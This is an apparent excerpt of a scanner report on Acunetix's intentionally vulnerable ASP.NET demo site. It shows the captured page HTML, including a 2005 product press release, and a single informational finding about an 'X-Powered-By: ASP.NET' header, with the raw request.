HN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3
Method	POST
Parameter
Attack
Evidence	X-Powered-By: ASP.NET
Show / hide Request and Response
Request Header - size: 463 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=3 Content-Length: 3721 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,721 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkSGybNfT47lMyCtVUwkelFkD9wY8%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwLEirm5BAL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBGR35lZNwQ8OqxiqiZO%2FZZOlJz58
